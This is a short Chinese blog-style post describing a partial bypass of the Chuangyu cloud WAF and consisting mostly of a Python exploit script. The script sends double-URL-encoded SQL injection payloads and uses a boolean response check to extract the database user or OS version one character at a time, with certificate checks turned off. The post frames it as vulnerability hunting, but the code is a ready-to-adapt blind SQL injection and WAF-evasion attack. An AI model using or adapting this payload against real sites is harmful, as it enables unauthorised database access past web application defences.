一次不完全的绕够创宇云waf

没啥好说的 直接上exp 为啥不过完全呢 因为只执行了一个内置函数 至于怎么select数据出来 我不知道 这里是挖洞 跑个user()就行了 不需要进一步利用

其实就是把关键字进行一次url全编码 然后再编码一次 user()使用CURRENT_USER()替换了

import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import time

words=''
payload=f"name=1%27%29or%2F**%2F%28%40%40version_compile_os%29+like+%27{words}%25%27--+"
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$&'()*+,-./:;<=>?@[\]^_`{|}~"
for i in range(30):
    for char in chars:
        #payload="name=1%27%29or%2F**%2F%28%40%40version_compile_os%29+like+%27{}%25%27--+".format(words+char)  #version_compile_os结果
        payload="name=1%27%29or%2F**%2F%28CURRENT_USER()%29+like+%27{}%25%27--+".format(words+char)  #查询用户
        resp=requests.post(url=url,headers=headers,data=payload,verify=False)
        #time.sleep(0.1)
        if "xxxxxxx" in resp.text:
            words =  words+str(char)
            print(words)